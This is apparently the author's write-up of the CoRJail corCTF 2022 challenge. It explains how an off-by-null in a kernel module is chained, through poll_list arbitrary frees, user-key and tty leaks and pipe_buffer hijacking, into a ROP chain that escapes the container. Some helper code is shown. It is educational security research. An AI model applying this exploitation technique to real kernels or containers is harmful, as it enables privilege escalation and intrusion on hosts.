CoRJail is a kernel exploitation challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters by exploiting an Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from an nsjail and gaining root privileges on a Container-Optimized OS. Let’s get started!
Overview
Last year, FizzBuzz101 and I designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. Over the past year, the technique has been used extensively in real-world exploits and was later extended to work with FUSE instead of userfaultfd.
For corCTF 2022, we decided to do the same, designing two challenges whose solutions required a novel approach. I decided to write CoRJail, demonstrating a novel approach I originally used to compromise Google’s kCTF. This technique consists of an arbitrary free primitive obtainable in almost every general purpose cache by exploiting poll_list objects. FizzBuzz101 instead designed a challenge, Cache of Castaways, whose solution required a cross-cache overflow into cred_jar to corrupt the current task’s cred structure and get root privileges.
CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image, improperly called CoROS. The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing the Linux Kernel Key Retention Service to be accessed from within the container. The custom seccomp profile can be found here.
The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.
All modern protections, like KASLR, SMEP, SMAP, KPTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, etc., were enabled. CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary, and CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, no modprobe_path trick.
Finally, I unset CONFIG_DEBUG_FS and CONFIG_KALLSYMS_ALL, making many symbols not available in /proc/kallsyms.
The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs interface, was created to actually display per-CPU syscall count, restricting the displayed result only to syscalls specified in a filter. Users were allowed to set a new filter using echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon. For example: echo -n 'sys_read,sys_write' > /proc_rw/cormon.
The default CoRMon filter was actually a hint; indeed, it displayed many syscalls I used in my exploit: poll(), keyctl() and setxattr().
If you want to solve the challenge before reading the rest of the article, it can be found in the corCTF 2022 Public Archive.
Please note that I could not upload the coros.qcow2 image to GitHub because of its size, so you will need to build it yourself using the provided script.
TL;DR
Exploit an Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get an OOB Read. Leak a heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key, then guess the correct options on the CoR Flag License Website to get the actual flag.
It’s Only A Zero, What Could Go Wrong?
Given the relatively complex exploitation stage and the 48-hour limit, I decided to make the bug extremely easy to spot and trigger. On the other hand, I decided not to provide source code, considering that the reverse engineering process would not have taken too long.
Here is the original CoRMon source code:
[Code listing: CoRMon source code]
We can interact with the module through a procfs interface using read() and write(). When we use write(), the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function, instead, is used to display syscall information when we use read().
As we can see, there is a clear Off-By-Null in cormon_proc_write().
Let’s extract the function from source code and ignore the rest:
[Code listing: cormon_proc_write()]
If the number of bytes written is greater than PAGE_SIZE (4096), then the len variable is set to PAGE_SIZE - 1; otherwise it is set to count. [1] Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k [2] and the list of syscalls is copied from user-space to kernel-space: it will be parsed by update_filter(). [3] The list, now copied to kernel-space, is subsequently null terminated. [4]
The check clearly does not cover the case where the number of bytes written is equal to PAGE_SIZE. Indeed, in that case, len would be equal to count, and the line syscalls[len] = '\x00' would result in syscalls[4096] = '\x00', causing the null byte to be written out of bounds.
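The boundary case can be checked with a small user-space model. This is only a sketch of the clamping rule described above, not the module's code: cormon_len() and null_byte_is_oob() are hypothetical helper names, and CHUNK_SIZE stands in for PAGE_SIZE.

```c
#include <stddef.h>

#define CHUNK_SIZE 4096 /* stands in for PAGE_SIZE, the size of the kmalloc-4k chunk */

/* Hypothetical model of the length check: clamp only when count > CHUNK_SIZE. */
size_t cormon_len(size_t count)
{
    return count > CHUNK_SIZE ? CHUNK_SIZE - 1 : count;
}

/* The chunk holds CHUNK_SIZE bytes, so valid indexes are 0..CHUNK_SIZE-1.
 * Returns 1 when the terminating write syscalls[len] = '\0' would land
 * outside the chunk, 0 otherwise. */
int null_byte_is_oob(size_t count)
{
    return cormon_len(count) >= CHUNK_SIZE;
}
```

In this model a write of exactly 4096 bytes is the only size for which the terminator falls outside the chunk: smaller writes stay in bounds, and larger ones are clamped to index 4095.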
This will be enough to escape from the container and get root privileges on the host.
A Dive Into poll_list Objects
As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features.
Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so this time the good old msg_msg will be left out of the picture. Instead, our exploitation process will mainly rely on poll_list objects. This structure can be used from within the container without having to meet any specific requirements.
The technique we will cover in this article is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, whereas here we only have a single null byte written out of bounds.
poll_list objects are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.
int poll(struct pollfd fds[], nfds_t nfds, int timeout);
poll() accepts three arguments:
- fds: an array of pollfd structures.
- nfds: the number of pollfd structures in the fds array.
- timeout: the number of milliseconds to wait for an event to occur.
The poll_list structure is composed of a pointer to the next poll_list [1], a length field, corresponding to the number of pollfd structures in the entries array [2], and entries, a flexible array of pollfd structures [3]. Each entry is 8 bytes in size.
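The sizes involved can be reproduced in user space. The sketch below is a model, assuming a 64-bit (LP64) build: the struct mirrors the three fields described above, and the two macros follow the way the kernel derives its per-stack and per-page entry counts from a 256-byte stack buffer and a 4096-byte page. poll_list_size() is a hypothetical helper added for illustration.

```c
#include <poll.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE  4096 /* page size assumed by this model */
#define POLL_STACK_ALLOC 256  /* size of the on-stack buffer */

/* User-space model of the kernel structure (64-bit layout assumed). */
struct poll_list {
    struct poll_list *next;  /* first QWORD: pointer to the next poll_list */
    int len;                 /* number of entries stored in this node */
    struct pollfd entries[]; /* flexible array, 8 bytes per entry */
};

#define N_STACK_PPS \
    ((POLL_STACK_ALLOC - sizeof(struct poll_list)) / sizeof(struct pollfd))
#define POLLFD_PER_PAGE \
    ((MODEL_PAGE_SIZE - sizeof(struct poll_list)) / sizeof(struct pollfd))

/* Bytes requested from the allocator for a node holding n entries. */
size_t poll_list_size(size_t n)
{
    return sizeof(struct poll_list) + n * sizeof(struct pollfd);
}
```

With a 16-byte header and 8-byte entries, a node with 510 entries is exactly 4096 bytes (kmalloc-4k), while a node with a single entry is 24 bytes and therefore lands in kmalloc-32.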
When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array to kernel-space:
[Code listing: do_sys_poll()]
do_sys_poll() has two paths, a slow and a fast path. As we can see at the beginning of the function, stack_pps [1], a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries [2]. This is the fast path: entries are stored on the stack to save memory and improve speed.
If we submit more than 30 pollfd entries, we enter the slow path and the remaining ones are allocated on the kernel heap. This means that if we do the math correctly, controlling the number of monitored file descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. [4]
It is possible to allocate a maximum of POLLFD_PER_PAGE (510) entries per page. [3] If this limit is exceeded, a new poll_list is allocated to store the remaining entries and it is connected to the previous one in a singly linked list. The for loop continues until all entries have been stored in kernel memory.
Let’s say, for example, we call poll() providing 30 + 510 + 1 file descriptors to the syscall. In kernel space, the first 30 entries are stored on the stack, and the remaining ones result in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list, with a single entry, allocated in kmalloc-32. The structures are connected in a singly linked list:
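To do the math for a given number of file descriptors, the split performed by the slow path can be modeled as follows. This is a sketch under the figures given above (30 entries on the stack, at most 510 per heap node, a 16-byte header and 8-byte entries on a 64-bit kernel); poll_heap_chunks() is a hypothetical helper. Taking the 30 stack entries into account, a full kmalloc-4k node followed by a one-entry kmalloc-32 node corresponds to 30 + 510 + 1 descriptors.

```c
#include <stddef.h>

enum {
    HDR_SIZE      = 16,  /* next pointer + len, padded (64-bit) */
    ENTRY_SIZE    = 8,   /* sizeof(struct pollfd) */
    STACK_ENTRIES = 30,  /* entries that fit in the on-stack buffer */
    PER_PAGE      = 510  /* POLLFD_PER_PAGE */
};

/* Fills sizes[] with the byte size of each heap-allocated poll_list that a
 * poll() call with nfds entries would need, in allocation order.
 * Returns the number of heap nodes (at most max). */
size_t poll_heap_chunks(size_t nfds, size_t *sizes, size_t max)
{
    size_t n = 0;
    size_t todo = nfds > STACK_ENTRIES ? nfds - STACK_ENTRIES : 0;

    while (todo > 0 && n < max) {
        size_t len = todo < PER_PAGE ? todo : PER_PAGE;

        sizes[n++] = HDR_SIZE + len * ENTRY_SIZE;
        todo -= len;
    }
    return n;
}
```

For instance, 541 descriptors yield two heap nodes of 4096 and 24 bytes, while 30 or fewer descriptors never touch the heap.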
After all poll_list objects have been allocated, there is a call to do_poll(): it will monitor the provided file descriptors until a specific event occurs or the timer expires. [5] The end_time variable here corresponds to the timeout variable we passed as the third argument to the poll() syscall. This means that poll_list objects can be kept in memory for an arbitrary amount of time; then, when the timer expires, they will be automatically freed.
The very interesting part is how poll_list structures are freed: a while loop is used to traverse the singly linked list, freeing each of them. [6] Now let’s look at what we have from an attacker’s perspective.
We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed to by its next field (first QWORD) is automatically freed when a timer that we control expires. This means that, given an Out-Of-Bounds Write or a Use-After-Free Write primitive, we can overwrite the next field of a poll_list structure with the address of a target object, and when the timer fires, that object will be automatically freed.
The only constraint is that we need to make sure the first QWORD of the target object is NULL; otherwise the while loop will treat it as a valid pointer and will try to access it. This is not a problem: we can use a misaligned free primitive, or we can simply target objects whose first QWORD is equal to zero.
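The effect of the cleanup loop can be illustrated with a user-space model. The sketch below is not kernel code: struct node is a simplified stand-in in which only the first QWORD matters, and free_chain() is a hypothetical function that mirrors the traversal described above, using free() in place of kfree().

```c
#include <stdlib.h>

/* Simplified stand-in: the loop only ever looks at the first QWORD. */
struct node {
    struct node *next;
};

/* Mirrors the cleanup loop: frees every object reachable through next,
 * stopping at the first object whose first QWORD is NULL.
 * Returns how many objects were freed. */
int free_chain(struct node *walk)
{
    int freed = 0;

    while (walk) {
        struct node *pos = walk;

        walk = walk->next; /* read the next pointer before freeing */
        free(pos);
        freed++;
    }
    return freed;
}
```

If the next field of a list node is redirected to an unrelated object whose first QWORD is zero, the loop frees that object too and then stops. A non-zero first QWORD would instead be followed as if it were another node.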
In the specific case of kmalloc-4k, if the poll_list->next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even with a single byte), making it point to another object in the slab. When the timer expires, the kernel will be tricked into freeing the wrong object. This is exactly what we are going to do in the exploit.
The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object because the poll() syscall will block until a specific event occurs or the timer expires.
[Code listing: poll_list spraying helpers]
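A minimal sketch of one spraying worker is shown here. It is not the author's original helper: struct poll_job, make_idle_fd() and poll_worker() are hypothetical names, and the choice of an idle pipe as the monitored descriptor is an assumption. The worker has the signature expected by pthread_create(), so each blocking poll() call can run in its own thread.

```c
#include <poll.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical description of one sprayed poll() call. */
struct poll_job {
    int fd;         /* descriptor that never becomes ready */
    nfds_t nfds;    /* number of pollfd entries: selects the target caches */
    int timeout_ms; /* how long the poll_list objects stay allocated */
    int result;     /* return value of poll(), filled in by the worker */
};

/* Returns the read end of a pipe that is never written to. The write end is
 * left open on purpose: closing it would make poll() report POLLHUP at once. */
int make_idle_fd(void)
{
    int p[2];

    if (pipe(p) != 0)
        return -1;
    return p[0];
}

/* Thread entry point: blocks in poll() until the timeout expires. */
void *poll_worker(void *arg)
{
    struct poll_job *job = arg;
    struct pollfd *pfds = calloc(job->nfds, sizeof(*pfds));

    if (!pfds) {
        job->result = -1;
        return NULL;
    }
    for (nfds_t i = 0; i < job->nfds; i++) {
        pfds[i].fd = job->fd;
        pfds[i].events = POLLERR;
    }
    job->result = poll(pfds, job->nfds, job->timeout_ms);
    free(pfds);
    return NULL;
}
```

A spray would start many such workers with pthread_create(), for example with nfds set to 30 + 510 + 1 to obtain one node in kmalloc-4k chained to one in kmalloc-32, and later join them once the timeout has expired. Note that nfds must not exceed the process RLIMIT_NOFILE limit.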
The Exploit - From Zero To Information Leak
The strategy we are going to use in the first part of the exploit consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the next field of a poll_list structure chained to another one in kmalloc-32, making the corrupted pointer point to another object in the slab. When the timer fires, that object will be automatically freed.
We need to choose a target structure that, once arbitrarily freed, can be corrupted and can give us an Out-Of-Bounds Read primitive, with a subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick. A good candidate could be simple_xattr, but we need the first QWORD of the target object to be NULL, so we cannot use it. Since add_key() and keyctl() are not blocked by seccomp, we can opt for user_key_payload instead.
The problem with this structure is that its first member, struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc, the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating each user key.
[Code listing: setxattr()]
With setxattr(), we can allocate a chunk of arbitrary size [1] and fill it with arbitrary data [2]; then it will be automatically freed [3]. We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero.
We simply need to call setxattr() right before alloc_key(): because of the freelist’s LIFO behavior, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. Now we can be sure the first QWORD is set to NULL.
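The reuse pattern can be illustrated with a toy LIFO allocator in user space. This is only a model: it ignores per-CPU slabs, freelist randomization and everything else a real SLUB cache does, and all names (lifo_alloc(), model_setxattr(), model_alloc_key(), and so on) are hypothetical. It assumes, as described above, that the key allocation leaves the first 16 bytes of the chunk (the rcu_head) untouched.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CHUNK_SIZE 32
#define NCHUNKS    4

static uint64_t pool[NCHUNKS][CHUNK_SIZE / 8]; /* toy slab, 8-byte aligned */
static void *free_stack[NCHUNKS];              /* LIFO freelist */
static size_t free_top;

/* Resets the toy slab: every chunk is free and full of stale 0xAA bytes. */
void lifo_init(void)
{
    memset(pool, 0xAA, sizeof(pool));
    free_top = 0;
    for (size_t i = 0; i < NCHUNKS; i++)
        free_stack[free_top++] = pool[i];
}

void *lifo_alloc(void)
{
    return free_top ? free_stack[--free_top] : NULL;
}

void lifo_free(void *p)
{
    if (p && free_top < NCHUNKS)
        free_stack[free_top++] = p;
}

/* Models setxattr(): allocate, fill with caller data, free on return.
 * The chunk address is returned only so the caller can observe it. */
void *model_setxattr(const void *value, size_t size)
{
    void *tmp = lifo_alloc();

    if (!tmp)
        return NULL;
    memcpy(tmp, value, size < CHUNK_SIZE ? size : CHUNK_SIZE);
    lifo_free(tmp);
    return tmp;
}

/* Models the key allocation: the first 16 bytes are left as they were. */
void *model_alloc_key(void)
{
    unsigned char *key = lifo_alloc();

    if (!key)
        return NULL;
    memset(key + 16, 0x41, CHUNK_SIZE - 16);
    return key;
}

uint64_t first_qword(const void *p)
{
    uint64_t v;

    memcpy(&v, p, sizeof(v));
    return v;
}
```

In this model, a key allocated right after model_setxattr() with a zero-filled value receives the same chunk and its first QWORD reads as zero, whereas a key allocated on a stale chunk keeps whatever bytes were there before.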
With this in mind, we can start writing our exploit:
[Code listing: exploit, initial heap spray]
First, we assign the current process to core 0 using assign_to_core() (a sched_setaffinity() wrapper), since we are working in a multi-core environment and slabs are per-CPU. [1] Then, we start spraying many seq_operations structures in kmalloc-32 to fill partial slabs, so the next allocations will end up in a brand new slab. [2]
We proceed using alloc_key() (a simple add_key() wrapper) to spray many user_key_payload structures in kmalloc-32. [3] As explained above, we use setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.
Now we finally spray poll_list structures in kmalloc-4k, chained to poll_list in kmalloc-32. [4] At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user_key_payload in orange.
We can continue spraying more user keys in kmalloc-32, to completely saturate the slab. [5] [Fig. 1B]
We are ready to trigger the Off-By-Null bug, hijack a poll_list next pointer and trigger the arbitrary free:
We can trigger the allocation of a chunk in kmalloc-4k by writing 4096 bytes to the CoRMon procfs interface. [1] This will also cause a null byte to be written out of bounds, and will corrupt the next object in memory. Since we sprayed poll_list structures in kmalloc-4k, and each one has a pointer to a poll_list in kmalloc-32, we will be able to corrupt one of the pointers, making it point to one of the user keys we sprayed in the previous step. [Fig. 2A]
Now we can use join_poll_threads() and wait until the timers expire and the poll_list objects are automatically freed. [2] One of the user_key_payload structures will be released as well. [Fig. 2B]
We caused a Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain an Out-Of-Bounds Read primitive:
[Code listing: exploit, information leak stage]
First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its len field (an unsigned short) with the two lower bytes of the single_next pointer. In our case, the two lower bytes of single_next are 0x4330, so this will give us a huge Out-Of-Bounds Read primitive. A proc_single_show() pointer, instead, will overwrite the first QWORD in the user key data field. [1] You can see the seq_operations structures in yellow in [Fig. 3A]; one of them corrupted the key.
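The overlap between the two structures can be checked with user-space models of their layouts. The sketch below assumes a 64-bit little-endian kernel; the struct definitions are simplified models (suffixed _model) rather than the kernel headers, and the address passed to corrupted_datalen() in the usage note is made up, with only its two lower bytes taken from the text.

```c
#include <stddef.h>
#include <stdint.h>

/* Model of struct rcu_head: two pointers, 16 bytes. */
struct rcu_head_model {
    void *next;
    void (*func)(void *);
};

/* Model of the user key header: the length sits at offset 16 and the
 * payload starts at offset 24 (8-byte aligned). */
struct user_key_payload_model {
    struct rcu_head_model rcu;
    unsigned short datalen;
    char data[] __attribute__((aligned(8)));
};

/* Model of seq_operations: four function pointers, 32 bytes. */
struct seq_operations_model {
    void *start;
    void *stop;
    void *next;
    void *show;
};

/* On a little-endian machine, the 16-bit length overlapping a pointer takes
 * the pointer's two lower bytes. */
uint16_t corrupted_datalen(uint64_t next_ptr)
{
    return (uint16_t)(next_ptr & 0xffff);
}
```

The length field and the next pointer share offset 16, while the key data and the show pointer share offset 24. With a pointer such as 0xffffffff81234330 (hypothetical upper bytes), the corrupted length becomes 0x4330, that is 17200 bytes readable from a 32-byte chunk.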
We can now use leak_kernel_pointer() to iterate through all the keys until we leak the proc_single_show address; this way we will identify the corrupted key and we will be able to calculate the kernel base address. [2] Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.
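One way to turn leaked data into a kernel base is sketched below. It is not the author's leak_kernel_pointer(): kernel_base_from_leak() is a hypothetical helper, and sym_offset (the offset of the leaked symbol from the kernel base) is an assumed, build-specific value. The sketch relies on two x86-64 assumptions: kernel text pointers have their upper 32 bits set, and KASLR never changes the low 12 bits of an address.

```c
#include <stddef.h>
#include <stdint.h>

/* Scans n leaked QWORDs for a value that looks like the expected kernel text
 * symbol and returns the corresponding kernel base, or 0 if none matches. */
uint64_t kernel_base_from_leak(const uint64_t *leak, size_t n,
                               uint64_t sym_offset)
{
    for (size_t i = 0; i < n; i++) {
        uint64_t v = leak[i];

        if ((v >> 32) != 0xffffffffULL)
            continue; /* not in the kernel text range */
        if ((v & 0xfff) != (sym_offset & 0xfff))
            continue; /* page offset does not match the symbol */
        return v - sym_offset;
    }
    return 0;
}
```

For a key whose payload was overwritten as described above, the first QWORD returned by reading the key would be the candidate pointer, so the scan would normally succeed on the first element.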
When we open a ptmx, two structures of interest are allocated: the well-known tty_struct in kmalloc-1024 and another one, tty_file_private, in kmalloc-32. Each tty_file_private structure has a pointer to the related tty_struct, therefore we can use it to leak the address of an object in kmalloc-1024.
We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]) [3], except the corrupted one, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]). [4] Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak the tty_struct address. [5] [Fig. 3B]
The Exploit - Hijacking Control Flow
At this point we need to free the object in kmalloc-1024.
[Code listing: exploit, poll_list reuse stage]
First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]) [1], then we replace them with poll_list objects (green chunks in [Fig. 4A]) [2]. Note that the seq_operations structure used to corrupt the user key is also freed and it is also replaced by a poll_list structure. [Fig. 4A]
Now we free the corrupted key, causing a Use-After-Free situation over the poll_list. [3] To exploit the Use-After-Free, we reuse the setxattr() trick used in the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to the address of the target object - 0x18 bytes [4], then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory.
In other words, since the chunk used by setxattr is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation. [5] Doing so, we will overwrite the next field of the poll_list structure in kmalloc-32 with the address of the target - 0x18 bytes. [Fig. 4B]
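The text does not say why the offset is 0x18. One plausible reading, stated here as an assumption, is that 0x18 is the size of the user_key_payload header (16 bytes of rcu_head plus the length field, padded to 24 bytes), so that a key later allocated on the misaligned chunk has its data start exactly at the target object. The arithmetic is sketched below with hypothetical helper names and a made-up address.

```c
#include <stdint.h>

#define KEY_HEADER_SIZE 0x18 /* assumed size of the user key header */

/* Address written into the poll_list next field. */
uint64_t misaligned_free_addr(uint64_t target)
{
    return target - KEY_HEADER_SIZE;
}

/* Where the payload of a key allocated at chunk would start. */
uint64_t key_data_addr(uint64_t chunk)
{
    return chunk + KEY_HEADER_SIZE;
}
```

Under this reading, key_data_addr(misaligned_free_addr(target)) is the target itself: for a target at 0xffff888010000400, the freed address would be 0xffff8880100003e8 and the key data would overlap the target from its first byte.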
Originally, my goal was to arbitrarily free a tty_struct and get RIP control by overwriting its tty_operations pointer. Then I changed my mind (too many checks, even if they can be bypassed), and I decided to target a pipe_buffer structure.
[Code listing: exploit, control flow hijacking stage]
We proceed by freeing all TTYs [1], and we spray pipe_buffer objects [2]. This way we replace all tty_struct with pipe_buffer in kmalloc-1024. Then, we wait until the timers expire, and the pipe_buffer object pointed to by the next field of the corrupted poll_list is automatically freed. [Fig. 5A]
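Why pipe_buffer objects land in kmalloc-1024 can be seen from a model of the structure. The sketch below reflects my reading of the 5.10 headers for a 64-bit build and is not the kernel definition itself: a pipe created with default settings holds an array of 16 pipe_buffer entries of 40 bytes each. pipe_bufs_alloc_size() is a hypothetical helper.

```c
#include <stddef.h>

/* User-space model of the structure (64-bit layout assumed). */
struct pipe_buffer_model {
    void *page;            /* offset 0 */
    unsigned int offset;   /* offset 8 */
    unsigned int len;      /* offset 12 */
    const void *ops;       /* offset 16: pointer to the operations table */
    unsigned int flags;    /* offset 24 */
    unsigned long private; /* offset 32 */
};

#define PIPE_DEF_BUFFERS 16 /* default number of buffers per pipe */

/* Size of the array allocated for a pipe with nr buffers. */
size_t pipe_bufs_alloc_size(size_t nr)
{
    return nr * sizeof(struct pipe_buffer_model);
}
```

The default array takes 640 bytes, which is served from kmalloc-1024, and the ops pointer of the first entry sits 16 bytes into the chunk.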
Finally, we free all user keys, and we reallocate them in kmalloc-1024: we use them to spray our ROP-chain. [3] One of the key payloads will corrupt the target pipe_buffer, overwriting the anon_pipe_buf_ops pointer with a stack pivot gadget.
Now we only need to close all pipes, triggering the call to pipe_release(). [4] This will execute our stack pivot gadget and we will finally be able to hijack control flow. [Fig. 5B]
The Exploit - Container Escape
The last piece of the puzzle is the ROP-chain to use to escape from the container. Let’s take a look at what I used in the exploit:
[Code listing: ROP-chain]
The first part has nothing special. We use a stack pivot gadget to hijack control flow [1], then prepare_kernel_cred() [2] and commit_creds() [3] to escalate privileges, and then we locate the Docker container task using find_task_by_vpid() [4] and we use switch_task_namespaces() [5] to replace its nsproxy structure with init_nsproxy. But this is not enough to escape from the container.
In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp. This means that we cannot use it to enter other namespaces after returning to user-space. We need to find an alternative approach, and we need to implement it in the ROP-chain.
Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can replicate what it does using copy_fs_struct() to clone the init_fs structure [6], then we locate the current task using find_task_by_vpid() [7] and we manually install the new fs_struct using a write-what-where gadget. [8]
We can finally use the KPTI trampoline with swapgs_restore_regs_and_return_to_usermode and get a shell on the host. [9]
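The tail of such a chain is the frame consumed by iretq when returning to user-space. The sketch below only lays out those five values in the order the CPU expects (RIP, CS, RFLAGS, RSP, SS). struct user_context and append_iret_frame() are hypothetical names, and the entry offset into the trampoline, as well as any dummy slots it pops before the frame, depend on the kernel build and are not modeled.

```c
#include <stddef.h>
#include <stdint.h>

/* User-space state to restore, saved before triggering the exploit. */
struct user_context {
    uint64_t rip;    /* user function to resume in, e.g. one spawning a shell */
    uint64_t cs;     /* user code segment selector */
    uint64_t rflags; /* saved flags */
    uint64_t rsp;    /* user stack pointer */
    uint64_t ss;     /* user stack segment selector */
};

/* Appends the iretq frame to chain starting at index idx.
 * Returns the index of the next free slot. */
size_t append_iret_frame(uint64_t *chain, size_t idx,
                         const struct user_context *ctx)
{
    chain[idx++] = ctx->rip;
    chain[idx++] = ctx->cs;
    chain[idx++] = ctx->rflags;
    chain[idx++] = ctx->rsp;
    chain[idx++] = ctx->ss;
    return idx;
}
```

On x86-64 Linux the user selectors are normally 0x33 for CS and 0x2b for SS. The remaining fields are typically captured from the running process before the chain is built.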
Here is the final exploit in action:
The final exploit can be found here: exploit.c.
PS: In the exploit I assign the process to another core before creating poll threads. This is useful to reduce noise due to thread creation on core 0 slabs. Once a thread has been created, it is assigned back to core 0 before calling poll().
Conclusion
poll_list objects can be used to obtain an arbitrary free primitive in almost every general purpose cache. Many recent vulnerabilities can be exploited using this structure in the complete absence of msg_msg objects.
CoRJail only had one solver. A big shout out goes to Kylebot for getting first blood. It turns out that extended security attributes were usable inside the container without requiring any special capability. So he could solve the challenge by transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow, targeting the list.next pointer of a simple_xattr structure in kmalloc-192. This cache is unaligned, so he made the corrupted pointer point into the middle of another simple_xattr object in the same slab. Here, he forged a fake header to obtain an Out-Of-Bounds Read primitive.
To fake a simple_xattr structure, he needed a valid pointer containing controlled data in the name field, so he ended up using another kCTF technique. He faked the pointer and its content using cpu_entry_area. This memory region is not affected by KASLR, and as reported by Kylebot, it is possible to use a div 0 or a ud2 instruction to copy all CPU registers into this zone and use them as a payload.
After obtaining an information leak, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach, isn’t it?
If you have any questions or need any clarification, feel free to contact me. You can find my contact information in About.
The challenge can be downloaded from the corCTF 2022 Public Archive.
References
Syscall statistics patch
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
modprobe_path trick
Unlinking attack with simple_xattr